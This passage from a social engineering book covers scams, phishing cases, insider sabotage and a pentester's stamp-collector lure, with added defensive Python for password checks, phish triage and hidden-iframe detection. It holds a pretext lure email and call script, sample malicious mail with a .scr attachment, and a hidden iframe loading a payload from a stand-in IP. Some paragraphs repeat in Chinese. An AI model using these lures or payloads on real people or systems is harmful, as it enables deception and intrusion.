Of course, this book discusses some of these facets, but the main focus is what you can learn from law enforcement, the politicians, the psychologists, and even children to better your abilities to audit and then secure yourself. Analyzing how a child can manipulate a parent so easily gives the social engineer insight into how the human mind works. Noticing how a psychologist phrases questions can help to see what puts people at ease. Noticing how a law enforcement agent performs a successful interrogation gives a clear path on how to obtain information from a target. Seeing how governments and politicians frame their messages for the greatest impact can show what works and what doesn’t. Analyzing how an actor gets into a role can open your eyes to the amazing world of pretexting. By dissecting the research and work of some of the leading minds in microexpressions and persuasion you can see how to use these techniques in social engineering. By reviewing some of the motivators of some of the world’s greatest salespeople and persuasion experts you can learn how to build rapport, put people at ease, and close deals.

Then by researching and analyzing the flip side of this coin—the con men, scam artists, and thieves—you can learn how all of these skills come together to influence people and move people in directions they thought they would never go.

Mix this knowledge with the skills of lock picks, spies who use hidden cameras, and professional information gatherers and you have a talented social engineer.

You do not use every one of these skills in each engagement, nor can you master every one of these skills. Instead, by understanding how these skills work and when to use them, anyone can master the science of social engineering. It is true that some people have a natural talent, like Kevin Mitnick, who could talk anyone into anything, it seemed. Frank Abagnale, Jr., seemed to have the natural talents to con people into believing he was who he wanted them to believe he was. Victor Lustig did the unbelievable, actually convincing some people that he had the rights to sell the Eiffel Tower, topped only by his scam on Al Capone.

These social engineers and many more like them seem to have natural talent or a lack of fear that enables them to try things that most of us would never consider attempting. Unfortunately in the world today, malicious hackers are continually improving their skills at manipulating people and malicious social engineering attacks are increasing. DarkReading posted an article (www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=226200272) that cites that data breaches have reached between $1 and $53 million per breach. Citing research by the Ponemon Institute DarkReading states, “Ponemon found that Web-borne attacks, malicious code, and malicious insiders are the most costly types of attacks, making up more than 90 percent of all cybercrime costs per organization per year: A Web-based attack costs $143,209; malicious code, $124,083; and malicious insiders, $100,300.” Malicious insiders being listed on the top three suggests that businesses need to be more aware of the threats posed by malicious social engineering, even from employees.

Many of these attacks could have been avoided if people were educated, because they could act on that education. Sometimes just finding out how malicious people think and act can be an eye opener.

As example on a much smaller and more personal scale, I was recently discussing with a close friend her financial accounts and how she was worried about being hacked or scammed. In the course of the conversation we started to discuss how easy it is to “guess” people’s passwords. I told her that many people use the same passwords for every account; I saw her face go white as she realized this is her. I told her that most people use simplistic passwords that combine things like their spouse’s name, his or her birthday, or anniversary date. I saw her go an ever-brighter shade of pale. I continued by saying that most of the time people chose the simplest “security question” such as “your (or your mother’s) maiden name” and how easy finding that information is via the Internet or a few fake phone calls.

 

Many people will list this information in Blippy, Twitter, or Facebook accounts. This particular friend didn’t use social media sites much, so I asked her whether she could picture herself giving out this information over a few phone calls. Of course she said no. To illustrate how easily people hand over personal information, I told her that I once saw a placemat in a restaurant that had a $50-off coupon for a local golf course—a very attractive offer. To take advantage of this offer, you only had to provide your name, date of birth, and street address, and provide a password for an account that would be set up and sent to your e-mail address. (I only noticed this in the first place because someone had started filling out the coupon and left it on the table.) Every day websites are created to collect such sensitive information.

A phone call with a survey or some quick research on the Internet can yield a birth date or anniversary date, and armed with this information I have enough to build a password attack list. Plus, a dozen sites offer detailed records of all sorts of personal information on an individual for a mere $9–$30 USD.
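
The password habits described in the last three paragraphs (one password for every account, assembled from a spouse’s name, a birthday, or an anniversary) are something a defender can address at the moment the password is set, before anyone gets to guess it. The Python below is an added example, not code from the book or from Social-Engineer.org: a password-policy check that rejects a candidate password if it contains fragments of the user’s own profile in the forms people usually type them, including common digit-for-letter substitutions. The Profile class, the sample profile, and the candidate passwords are constructed for illustration.

```python
"""Refuse passwords that are built from the user's own personal details.

Added example (not from the book): the check a registration or password-change
handler could run so that 'spouse's name plus anniversary' passwords are
rejected when created rather than guessed later. Profile fields and the sample
profile are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import date


@dataclass
class Profile:
    """Details a caller could learn from a survey call or a social-media page."""
    first_name: str
    last_name: str
    spouse_name: str
    birth_date: date
    anniversary: date
    extra_words: list[str] = field(default_factory=list)  # pets, children, home town


def _date_tokens(d: date) -> set[str]:
    """The usual ways a date is typed into a password: 1982, 0714, 07141982, 14071982, 071482, 7141982."""
    y4, y2 = f"{d.year:04d}", f"{d.year % 100:02d}"
    mm, dd = f"{d.month:02d}", f"{d.day:02d}"
    return {
        y4, mm + dd, dd + mm,
        mm + dd + y4, dd + mm + y4, y4 + mm + dd,
        mm + dd + y2, dd + mm + y2,
        f"{d.month}{d.day}{d.year}",
    }


def personal_tokens(p: Profile) -> set[str]:
    """Lower-cased fragments that must not appear in the password.

    Fragments shorter than four characters (a two-digit year, a short nickname)
    are dropped: they would reject almost any password without adding security.
    """
    tokens = {w.lower() for w in (p.first_name, p.last_name, p.spouse_name, *p.extra_words)}
    for d in (p.birth_date, p.anniversary):
        tokens |= _date_tokens(d)
    return {t for t in tokens if len(t) >= 4}


# Undo the substitutions people use to 'disguise' a word: K4r3n -> karen.
_DELEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                         "7": "t", "@": "a", "$": "s", "!": "i"})


def personal_info_in(password: str, p: Profile) -> list[str]:
    """Return the profile fragments found in the password (sorted; empty means none).

    Words are matched against the password as typed and against its de-leeted
    form; date fragments only against the password as typed, because de-leeting
    would mangle the digits.
    """
    lowered = password.lower()
    deleeted = lowered.translate(_DELEET)
    return sorted(
        tok for tok in personal_tokens(p)
        if tok in lowered or (tok.isalpha() and tok in deleeted)
    )


def is_acceptable(password: str, p: Profile, min_length: int = 12) -> bool:
    """Policy decision: long enough and free of the user's own details."""
    return len(password) >= min_length and not personal_info_in(password, p)


# Constructed sample profile used by the demo below.
SAMPLE_PROFILE = Profile(
    first_name="Mary", last_name="Smith", spouse_name="Karen",
    birth_date=date(1982, 7, 14), anniversary=date(2009, 6, 20),
    extra_words=["Rover"],
)

if __name__ == "__main__":
    for candidate in ("Karen2009!", "K4r3n2009!", "Rover0620", "correct horse battery staple"):
        print(f"{candidate!r:32} -> {personal_info_in(candidate, SAMPLE_PROFILE) or 'OK'}")
```

The check is meant to run alongside a length requirement and a breached-password list, not replace them; its job is the one gap those two miss, a password that is unique and long enough but still reconstructable from what a friendly survey call or a public profile reveals.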

Realizing how malicious social engineers think, how scammers react to information, and how con men will try anything, can help people to be more aware of what is going on around them.

A team of security enthusiasts and I have scoured the Internet collecting stories that show many different aspects of social engineering. These stories can help answer a vital question—“how is social engineering used in society over time?”—and see where social engineering’s place is and how it is used maliciously.

Social Engineering and Its Place in Society

As already discussed, social engineering can be used in many areas of life, but not all of these uses are malicious or bad. Many times social engineering can be used to motivate a person to take an action that is good for them. How?

Think about this: John needs to lose weight. He knows he is unhealthy and needs to do something about it. All of John’s friends are overweight, too. They even make jokes about the joys of being overweight and say things like, “I love not worrying about my figure.” On one hand, this is an aspect of social engineering. It is social proof or consensus, where what you find or deem acceptable is determined by those around you. Because John’s close associations view being overweight as acceptable, it is easier for John to accept it. However, if one of those friends lost weight and did not become judgmental but was motivated to help, the possibility exists that John’s mental frame about his weight might change and he might start to feel that losing weight is possible and good.

This is, in essence, social engineering. So you can clearly see how social engineering fits into society and everyday life, the following sections present a few examples of social engineering, scams, and manipulation and a review of how they worked.

The 419 Scam

The 419 scam, better known as the Nigerian Scam, has grown into an epidemic. You can find an archived story and article about this scam at www.social-engineer.org/wiki/archives/ConMen/ConMen-Scam-NigerianFee.html.

Basically, an email (or, as of late, a letter) comes to the target telling him he has been singled out for a very lucrative deal and all he needs to do is offer a little bit of help. If the victim will help the letter sender extract a large sum of money from foreign banks, he can have a percentage. After the target is confident and “signs on,” a problem arises that causes the target to pay a fee. After the fee is paid, another problem comes up, along with another fee. Each problem is “the last” with “one final fee,” and this can be stretched out over many months. The victim never sees any money and loses from $10,000–$50,000 USD in the process. What makes this scam so amazing is that in the past, official documents, papers, letterhead, and even face-to-face meetings have been reported.

Recently a variation of this scam has popped up where victims are literally sent a real check. The scammers promise a huge sum of money and want in return only a small portion for their efforts. If the target will wire transfer a small sum (in comparison) of $10,000, when they receive the promised check they can deposit the check and keep the difference. The problem is that the check that comes is a fraud, and when the victim goes to cash it she is slapped with check fraud charges and fines, in some cases after she has already wired money to the scammer.

This scam is successful because it plays on the victim’s greed. Who wouldn’t give $10,000 to make $1,000,000 or even $100,000? Most smart people would. When these people are presented with official documents, passports, receipts, and even official offices with “government personnel” then their belief is set and they will go to great lengths to complete the deal. Commitment and consistency play a part in this scam as well as obligation. I discuss these attributes in greater detail in later chapters, and when I do, you will see why this scam is so powerful.

The Power of Scarcity

The article archived at www.social-engineer.org/wiki/archives/Governments/Governments-FoodElectionWeapon.html talks about a principle called scarcity.

Scarcity is when people are told something they need or want has limited availability and to get it they must comply with a certain attitude or action. Many times the desired behavior is not even spoken, but the way it is conveyed is by showing people who are acting “properly” getting rewards.

The article talks about the use of food to win elections in South Africa. When a group or person does not support the “right” leader, foodstuffs become scarce and jobs people once had are given to others who are more supportive. When people see this in action, it doesn’t take long to get them in line. This is a very malicious and hurtful form of social engineering, but nonetheless, one to learn from. It is often the case that people want what is scarce, and they will do anything if they are led to believe that certain actions will cause them to lose out on those items. What makes certain cases even worse, as in the earlier example, is that a government took something necessary to life and made it “scarce” and available only to supporters—a malicious, but very effective, manipulation tactic.

The Dalai Lama and Social Engineering

The interesting article archived at www.social-engineer.org/wiki/archives/Spies/Spies-DalaiLama.html details an attack made on the Dalai Lama in 2009.

A Chinese hacker group wanted to access the servers and files on the network owned by the Dalai Lama. What methods were used in this successful attack?

The attackers convinced the office staff at the Dalai Lama’s office to download and open malicious software on their servers. This attack is interesting because it blends both technology hacking and social engineering.

The article states, “The software was attached to e-mails that purported to come from colleagues or contacts in the Tibetan movement, according to researcher Ross Anderson, professor of security engineering at the University of Cambridge Computer Laboratory, cited by the Washington Times Monday. The software stole passwords and other information, which in turn gave the hackers access to the office’s e-mail system and documents stored on computers there.”

Manipulation was used as well as common attack vectors such as phishing (the practice of sending out emails with enticing messages and links or files that must be opened to receive more information; often those links or files lead to malicious payloads) and exploitation. This attack can work and has worked against major corporations as well as governments. This example is just one in a large pool of examples where these vectors cause massive damage.

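The Dalai Lama case above pairs a technical payload with a social pretext: the malware arrived attached to mail that appeared to come from colleagues. The Python below is an added example (not code from the book or from the cited article) of the triage a mail gateway or an analyst’s script can apply to such a message: it compares the From display name against an internal directory, flags sender domains that borrow the organization’s name, notes a Reply-To that differs from the sender, and flags attachment types that should never arrive unsolicited. The organization domain example.org, the two-entry directory, and both sample messages are constructed.

```python
"""Gateway-style triage for mail that claims to come from a colleague.

Added example for the attack described above; not code from the book or the
cited article. The organisation domain, the directory and both messages are
constructed for illustration.
"""
from __future__ import annotations

import os
from email import policy
from email.parser import Parser
from email.utils import parseaddr

ORG_DOMAIN = "example.org"  # constructed: the organisation's own mail domain

# Constructed internal directory: display name -> the only address it should use.
DIRECTORY = {
    "Tenzin Dorje": "tenzin.dorje@example.org",
    "Lhamo Tsering": "lhamo.tsering@example.org",
}

# File types that should not arrive as unsolicited attachments.
EXECUTABLE_EXTS = {".exe", ".scr", ".js", ".vbs", ".hta", ".jar", ".bat", ".cmd", ".lnk", ".iso"}
MACRO_EXTS = {".doc", ".xls", ".docm", ".xlsm", ".pptm"}  # legacy or macro-enabled Office


def sender_findings(msg) -> list[str]:
    """Compare the From header against the directory and the organisation domain."""
    name, addr = parseaddr(str(msg["From"] or ""))
    addr, name = addr.lower(), name.strip()
    domain = addr.rsplit("@", 1)[-1]
    findings = []

    # A display name we know, attached to an address we do not: classic impersonation.
    known = next((a for n, a in DIRECTORY.items() if n.lower() == name.lower()), None)
    if known and known.lower() != addr:
        findings.append(f"display name '{name}' belongs to {known} but mail came from {addr}")

    # Domains that borrow the organisation's label (example-mail.net, example.org.evil.test ...).
    if domain != ORG_DOMAIN and ORG_DOMAIN.split(".")[0] in domain:
        findings.append(f"lookalike sender domain '{domain}'")

    # Replies silently routed elsewhere are a frequent sign of a spoofed sender.
    reply_to = parseaddr(str(msg["Reply-To"] or ""))[1].lower()
    if reply_to and reply_to != addr:
        findings.append(f"Reply-To {reply_to} differs from From {addr}")
    return findings


def attachment_findings(msg) -> list[str]:
    """Flag attachment types that should never be opened from unsolicited mail."""
    findings = []
    for part in msg.iter_attachments():          # yields nothing for single-part mail
        filename = (part.get_filename() or "").lower()
        ext = os.path.splitext(filename)[1]      # 'report.pdf.exe' -> '.exe'
        if ext in EXECUTABLE_EXTS:
            findings.append(f"executable attachment '{filename}'")
        elif ext in MACRO_EXTS:
            findings.append(f"macro-capable document '{filename}'")
    return findings


def analyse(raw_message: str) -> dict:
    """Return the findings and a verdict: 'quarantine' if anything was flagged, else 'deliver'."""
    msg = Parser(policy=policy.default).parsestr(raw_message)
    findings = sender_findings(msg) + attachment_findings(msg)
    return {"findings": findings, "verdict": "quarantine" if findings else "deliver"}


# Constructed message: known colleague's name, outside lookalike domain, screensaver attachment.
SAMPLE_PHISH = """\
From: Tenzin Dorje <tenzin.dorje@example-mail.net>
To: office@example.org
Subject: Updated contact list
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please open the attached list and update your records.

--b1
Content-Type: application/octet-stream; name="contacts.scr"
Content-Disposition: attachment; filename="contacts.scr"
Content-Transfer-Encoding: base64

aGVsbG8=
--b1--
"""

# Constructed message: genuine internal sender, plain text, nothing attached.
SAMPLE_CLEAN = """\
From: Lhamo Tsering <lhamo.tsering@example.org>
To: office@example.org
Subject: Lunch
Content-Type: text/plain; charset="utf-8"

See you at noon.
"""

if __name__ == "__main__":
    for label, raw in (("phish", SAMPLE_PHISH), ("clean", SAMPLE_CLEAN)):
        print(label, analyse(raw))
```

None of these checks reads the body: they work on headers and attachment metadata alone, which is what makes them cheap enough to run on every inbound message. A convincing pretext in the text still fails the display-name check, because the attacker cannot send from the colleague’s real mailbox without first compromising it.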
Employee Theft

The topic of employee theft could fill volumes, especially in light of the staggering statistic found at www.social-engineer.org/wiki/archives/DisgruntledEmployees/DisgruntledEmployees-EmployeeTheft.html that more than 60 percent of employees interviewed admitted to taking data of one sort or another from their employers.

Many times this data is sold to competitors (as happened in this story from a Morgan Stanley employee: www.social-engineer.org/wiki/archives/DisgruntledEmployees/DisgruntledEmployees-MorganStanley.html). Other times employee theft is in time or other resources; in some cases a disgruntled employee can cause major damage.

I once talked to a client about employee discharge policies, things like disabling key cards, disconnecting network accounts, and escorting discharged employees out of the building. The company felt that everyone was part of the “family” and that those policies wouldn’t apply.

Unfortunately, the time came to let go of “Jim,” one of the higher-ranking people in the company. The “firing” went well; it was amicable and Jim said he understood. The one thing the company did right was to handle the firing around closing time to avoid embarrassment and distraction. Hands were shaken, and then Jim asked the fateful question, “Can I take an hour to clean out my desk and take some personal pictures off my computer? I will turn my key card in to the security guard before I leave.”

Feeling good about the meeting, they all quickly agreed and left with smiles and a few laughs. Then Jim went to his office, packed a box of all his personal items, took the pictures and other data off his computer, connected to the network, and wiped clean 11 servers’ worth of data—accounting records, payroll, invoices, orders, history, graphics, and much more just deleted in a matter of minutes. Jim turned in his key card as he promised and calmly left the building with no proof that he was the one to initiate these attacks.

The next morning a call came in to me from the owner describing the carnage in the ex-employee’s wake. Hoping for a silver bullet, the client had no choice but to try to recover what could be recovered forensically and start over from the backups, which were more than two months old.

A disgruntled employee who is left unchecked can be more devastating than a team of determined and skilled hackers. Losses to businesses in the U.S. alone due to employee theft are estimated at $15 billion USD.

These stories may leave a question about what different categories of social engineers are out there and whether they can be classified.

DarkMarket and Master Splynter

In 2009 a story broke about an underground group called DarkMarket—the so-called eBay for criminals, a very tight group that traded stolen credit card numbers and identity theft tools, as well as the items needed to make fake credentials and more.

An FBI agent by the name of J. Keith Mularski went under deep cover and infiltrated the DarkMarket site. After a while, Agent Mularski was made an administrator of the site. Despite many trying to discredit him, he hung in for more than three years as the admin of the site.

During this time, Mularski had to live as a malicious hacker, speak and act as one, and think as one. His pretext was one of a malicious spammer and he was knowledgeable enough to pull it off. His pretext and his social engineering skills paid off because Agent Mularski infiltrated DarkMarket as the infamous Master Splynter, and after three years was essential in shutting down a massive identity theft ring.

The three-year social engineering sting operation netted 59 arrests and prevented over $70 million in bank fraud. This is just one example of how social engineering skills can be used for good.

The Different Types of Social Engineers

As previously discussed, social engineering can take on many forms. It can be malicious and it can be friendly, it can build up and it can tear down. Before moving on to the core of this book, take a brief look at the different forms of social engineers and a very short description of each:

• Hackers: Software vendors are becoming more skilled at creating software that is hardened, or more difficult to break into. As hackers are hitting more hardened software and as software and network attack vectors, such as remote hacking, are becoming more difficult, hackers are turning to social engineering skills. Often using a blend of hardware and personal skills, hackers are using social engineering in major attacks as well as in minor breaches throughout the world.
• Penetration testers: Since a real-world penetration tester (also known as a pentester) is very offensive in nature, this category must follow after hackers. True penetration testers learn and use the skills that malicious hackers use in order to help ensure a client’s security. Penetration testers are people who might have the skills of a malicious black hat but who never use the information for personal gain or to harm the target.
• Spies: Spies use social engineering as a way of life. Often employing every aspect of the social engineering framework (discussed later in this chapter), spies are experts in this science. Spies from all around the world are taught different methods of “fooling” victims into believing they are someone or something they are not. In addition to being taught the art of social engineering, many times spies also build on credibility by knowing a little or even a lot about the business or government they are trying to social engineer.
• Identity thieves: Identity theft is the use of information such as a person’s name, bank account numbers, address, birth date, and social security number without the owner’s knowledge. This crime can range from putting on a uniform to impersonating someone to much more elaborate scams. Identity thieves employ many aspects of social engineering, and as time passes they seem more emboldened and indifferent to the suffering they cause.
• Disgruntled employees: After an employee has become disgruntled, they often enter into an adversarial relationship with their employer. This can often be a one-sided situation, because the employee will typically try to hide their level of displeasure so as not to put their employment at risk. Yet the more disgruntled they become, the easier it becomes to justify acts of theft, vandalism, or other crimes.
• Scam artists: Scams or cons appeal to greed or other principles that attract people’s beliefs and desires to “make a buck.” Scam artists or con men master the ability to read people and pick out little cues that make a person a good “mark.” They also are skillful at creating situations that present as unbeatable opportunities to a mark.
• Executive recruiters: Recruiters also must master many aspects of social engineering. Having to master elicitation as well as many of the psychological principles of social engineering, they become very adept at not only reading people but also understanding what motivates people. Many times a recruiter must take into consideration and please not only the job seeker but also the job poster.
• Salespeople: Similar to recruiters, salespeople must master many people skills. Many sales gurus say that a good salesperson does not manipulate people but uses their skills to find out what people’s needs are and then sees whether they can fill them. The art of sales takes many skills such as information gathering, elicitation, influence, psychological principles, as well as many other people skills.
• Governments: Not often looked at as social engineers, governments utilize social engineering to control the messages they release as well as the people they govern. Many governments utilize social proof, authority, and scarcity to keep their subjects under control. This type of social engineering is not always negative, because some of the messages governments relay are for the good of the people, and using certain elements of social engineering can make the message more appealing and more widely accepted.
• Doctors, psychologists, and lawyers: Although the people in these careers might not seem like they fit into the same category as many of these other social engineers, this group employs the same methods used by the other groups in this list. They must use elicitation and proper interview and interrogation tactics, as well as many if not all of the psychological principles of social engineering, to manipulate their “targets” (clients) into the direction they want them to take.

Regardless of the field, it seems that you can find social engineering or an aspect of it. This is why I hold firmly to the belief that social engineering is a science. Set equations exist that enable a person to “add up” elements of social engineering to lead to the goal. In the example of a con man, think of the equation like this: pretext + manipulation + attachment to greed = target being socially engineered.

In every situation, knowing what elements will work is the hard part, but then learning how to utilize those elements is where the skill comes in. This was the basis for thought behind developing the social engineering framework. This framework has revolutionized the way social engineering is dissected, as discussed in the next section.

The Social Engineering Framework and How to Use It

Through experience and research I have tried to outline the elements that make up a social engineer. Each of these elements defines a part of the equation that equals a whole social engineer. These aspects are not set in stone; as a matter of fact, from its original state until now the framework has grown.

The purpose of the framework is to give enough information for anyone to build on these skills. The framework is not designed to be an all-inclusive resource for all information in each chapter. For example, the portion of Chapter 5 that covers microexpressions is based on the research of some of the greatest minds in this field and my experience in using that information. By no means is it meant to replace the 50 years of research by such great minds as Dr. Paul Ekman.

As you read through the framework you will see that by utilizing the many skills within it, you can not only enhance your security practice, but also your mindset about how to remain secure, how to communicate more fully, and how to understand how people think.

Refer to the table of contents for a clear picture of the framework or view it online at www.social-engineer.org/framework. At first glance the framework may appear daunting, but inside this book you will find an analysis of each topic that will enable you to apply, enhance, and build these skills.

Knowledge is power—it is true. In this sense, education is the best defense against most social engineering attacks. Even the ones that knowledge can’t protect 100 percent against, having details of these attacks keeps you alert. Education can help you enhance your own skills, as well as be alert.

Along with education, though, you need practice. This book was not designed to be a once-read manual; instead it was designed to be a study guide. You can practice and customize each section for your needs. The framework is progressive in the sense that it is the way a social engineering attack is laid out. Each section of the framework discusses the next topic in the order that a social engineer might utilize that skill in their engagement or planning phases.

The framework shows how an attack might be outlined. After the attack is planned out, the skills that are needed can be studied, enhanced, and practiced before delivery.

Suppose, for example, that you are planning a social engineering audit against a company that wanted to see whether you could gain access to its server room and steal data.

Maybe your plan of attack would be to pretend to be a tech support person who needs access to the server room. You would want to gather information, maybe even perform a dumpster dive.

Then under the pretext of being the tech guy, you could utilize some covert camera tools as well as practice the proper language and facial/vocal cues for how to act, sound, and look like a tech guy.

If you locate what company your client uses for tech support you may need to do info gathering on it. Who does your client normally get to service them? What are the names of the employees with whom they interact? The attack needs to be planned out properly.

This book is not just for those who perform audits, though. Many readers are curious about what the attacks are, not because they are protecting a company, but because they need to protect themselves. Not being aware of the way a malicious social engineer thinks can lead someone down the path toward being hacked.

College students in the field of security have also used the framework. The information in the framework outlines a realistic path for these vectors, or methods of attack, and enables the reader to study them in depth.

Generally, this information can also help enhance your ability to communicate in everyday life. Knowing how to read facial expressions or how to use questions to put people at ease and elicit positive responses can enhance your ability to communicate with your family and friends. It can assist you in becoming a good listener and more aware of people’s feelings.

Being able to read people’s body language, facial expressions, and vocal tones can also enhance your ability to be an effective communicator. Understanding how to protect yourself and your loved ones will only make you more valuable and more aware of the world around you.

Summary

Like any book, the knowledge contained herein is only useful if you put it into practice. The more you practice the more you will succeed at mastering these skills.

Previously, I discussed how social engineering is like mastering the art of cooking. By mixing the right ingredients in the right quantity you can have a meal that is full of flavor and excitement. The first time you try to cook a meal it might have too much salt or it might lack flavor altogether, but you don’t immediately throw in the towel—you keep trying until you get it right. The same goes for social engineering. Some of the necessary skills may come more naturally to you and others may be more difficult.

If a particular topic is hard to understand or difficult for you to grasp, do not give up, and do not assume you cannot learn it. Anyone can learn and use these skills with the right amount of effort and work.

Also keep in mind that, just like a real recipe, many “ingredients” go into a good social engineering gig. The first ingredient might make more sense after you get down the line a little more. Certain skills—such as “the human buffer overflow” covered in Chapter 5—will only make sense after you master some of the other skills discussed in this book.

Regardless, keep practicing and make sure to do extra research on topics for which you need clarity. Now let’s start cooking. Your “recipe” starts in the next chapter with the first ingredient, information gathering.

Chapter 2

Information Gathering

War is ninety percent information.

—Napoleon Bonaparte

It has been said that no information is irrelevant. Those words ring true when it comes to this chapter on information gathering. Even the slightest detail can lead to a successful social engineering breach.

My good friend and mentor, Mati Aharoni, who has been a professional pentester for more than a decade, tells a story that really drives this point home. He was tasked with gaining access to a company that had an almost nonexistent footprint on the Web. Because the company offered very few avenues to hack into, gaining this access would prove to be very challenging.

Mati 开始在互联网上搜索任何可能找到线索的细节。在一次搜索中,他发现一位公司高级官员在一个集邮论坛上使用公司电子邮件,并表示对 20 世纪 50 年代的邮票很感兴趣。Mati 很快注册了一个 URL,类似于www.stampcollection.com,然后在 Google 上找到了一堆看起来很旧的 1950 年邮票图片。他快速创建了一个网站来展示他的“邮票收藏”,然后撰写了一封电子邮件给公司官员:

Mati began scouring the Internet for any details that could lead to a path in. In one of his searches he found a high-ranking company official who used his corporate email on a forum about stamp collecting and who expressed an interest in stamps from the 1950s. Mati quickly registered a URL, something like www.stampcollection.com, and then found a bunch of old-looking 1950 stamp pictures on Google. Creating a quick website to show his “stamp collection,” he then crafted an email to the company official:

 

尊敬的先生,

Dear Sir,

 

我在www.forum.com上看到您对 20 世纪 50 年代的邮票感兴趣。最近我的祖父去世了,给我留下了一些邮票收藏,我想出售。我建立了一个网站;如果您想查看,请访问www.stampcollection.com

I saw on www.forum.com you are interested in stamps from the 1950s. Recently my grandfather passed away and left me with a stamp collection that I would like to sell. I have a website set up; if you would like to see it please visit www.stampcollection.com.

 

谢谢,

Thanks,

 

马蒂

Mati

 

在将电子邮件发送给目标之前,他想确保产生最大影响。他从论坛帖子中获取了办公室电话号码,并给该男子打电话。“早上好,先生,我是鲍勃。我在www.forum.com上看到了您的帖子。我祖父最近去世了,他给我留下了一堆 20 世纪 50 年代和 60 年代的邮票。我拍了照片并做了一个网站。如果您有兴趣,我可以向您发送链接,您可以看看。”

Before he sent the email to the target, he wanted to ensure there would be maximum impact. He took the office number from the forum post and placed a phone call to the man. “Good morning, sir, this is Bob. I saw your posting on www.forum.com. My grandfather recently passed and he left me a bunch of stamps from the 1950s and 60s. I took pictures and made a website. If you are interested I can send you the link and you can take a look.”

 

The target was very eager to see the collection and readily accepted the email. Mati sent it and waited for him to click the link. What Mati had done was embed a malicious frame in the website. The code in that frame exploited a vulnerability known at the time in the popular Internet Explorer browser and handed control of the target's computer to Mati. A drive-by attack of this kind needs nothing from the victim beyond loading the page, which is why an unpatched browser turns a harmless-looking link into a full compromise.

The wait was not long: as soon as the man received the email he clicked the link, and the company's perimeter was compromised.

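The attack above relied on a frame the visitor never had to notice. As an added example, not from the book or from Mati's engagement, the following Python script shows the check a defender would run over a page of this kind: it parses the HTML with the standard library and flags any iframe that is hidden, zero-sized, or loads content from a host other than the page's own. The sample page, the use of www.stampcollection.com as the page's own host, and the 198.51.100.7 address are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page for this example: a "stamp gallery" with one
# hidden, zero-sized frame pulling content from an unrelated host.
SAMPLE_PAGE = """
<html><body>
<h1>Grandfather's stamps</h1>
<img src="/img/stamp_1950.jpg" alt="1950 stamp">
<iframe src="http://198.51.100.7/ie_payload.html" width="0" height="0"
        style="display:none"></iframe>
<iframe src="https://www.stampcollection.com/gallery" width="600" height="400"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(attrs, name):
    """Return the width/height attribute as an int, or None if absent/non-numeric."""
    raw = attrs.get(name, "").strip().lower().rstrip("px")
    try:
        return int(raw)
    except ValueError:
        return None


def is_hidden(attrs):
    """True if the frame is styled invisible or sized to 1px or less."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    width, height = _dimension(attrs, "width"), _dimension(attrs, "height")
    return (width is not None and width <= 1) or (height is not None and height <= 1)


def find_suspicious_iframes(html_text, page_host):
    """Return [(src, [reasons])] for frames that are hidden or off-site.

    page_host is the hostname the page itself was served from; a frame that
    loads from anywhere else is reported even when it is visible, because
    the exploit page in the story need not sit on the lure's own domain.
    """
    collector = IframeCollector()
    collector.feed(html_text)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden or zero-size")
        host = urlparse(src).hostname
        if host and host != page_host.lower():
            reasons.append("off-site host " + host)
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "www.stampcollection.com"):
        print(src, "->", ", ".join(reasons))
```

Run against the sample, the script reports only the zero-sized frame, for two reasons at once (it is hidden and it loads from an address unrelated to the gallery); the visible, same-site gallery frame is left alone. In a real review the page would be fetched with a non-browser client so that no frame is ever rendered.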

 

A tiny piece of information, the corporate email address this man used to look for stamps, is what led to this compromise. No piece of information is irrelevant. With that in mind, here are the questions that come up with regard to information gathering:

  • How can you gather information?
  • What sources exist for social engineers to gather information?
  • What can you glean from this information to profile your targets?
  • How can you locate, store, and catalog all this information for the easiest level of use?

These are just a few of the questions you will need to answer in order to accomplish proper and effective information gathering. With the plethora of social networking sites out there, people can easily share every aspect of their lives with anyone they choose, making potentially damaging information more readily available than ever before. This chapter focuses on the principles of information gathering by presenting examples of how it is used in social engineering, and of the devastating effects some of the information people release on the Web can have on their personal and business security.

Many of the skills or methods a social engineer may use come from other fields. One field that is superb at gathering information is sales. Salespeople tend to be very talkative, easygoing, and very good at collecting data about those with whom they interact.

I once read a book on sales in which the author encouraged salespeople to gather referrals from the buyer, with something along these lines: "Can you tell me one person who you think could benefit from this product as much as you will?"

Simple wording like that can get a person to open up and refer family, friends, and maybe even coworkers. Harvesting this information and then storing it gives salespeople what they call "warm leads" to call on. A warm lead is a person with whom they have an "in," a way to get in the door without having to cold call.

The salesperson can now call on those referrals and say something like, "I was just at Jane's house two doors down, and she bought our premium policy. After reviewing the benefits and paying for the year up front, she said you might benefit from the same coverage. Do you have a minute for me to show you what Jane purchased?"

These skills used by salespeople are often mirrored by social engineers. Of course, a social engineer is not asking for referrals, but think about the flow of information in and out of this conversation. The salesperson gathers information from his present client, then relays it in a way that makes the new "target" more willing to listen and let him in. In addition, by dropping hints about what the first customer bought and using words like "premium" and "up front," the salesperson is preloading the new target with the keywords he intends to use on him a little later. This technique is effective because it builds trust, uses familiarity, and lets the target feel comfortable with the salesperson, or the social engineer, giving their mind a bridge over the gap that would normally exist. This chapter, as well as the following one, delves deep into these topics.

As a social engineer, both angles are of vital importance to understand and then to use effectively. To return to the chef illustration from Chapter 1: a good chef knows how to spot quality products, fresh vegetables, and good meat. They know what goes into the recipe, but unless the right quantities are used the food may be too bland, too strong, or not good enough to eat at all. Simply knowing that a recipe calls for salt doesn't make you a chef, but knowing how to mix the right amounts and types of ingredients can help you master the art of cooking. A social engineer needs to master the type and quantity of skills to be used (the "recipe"). Once that is done, they can become a master social engineer.

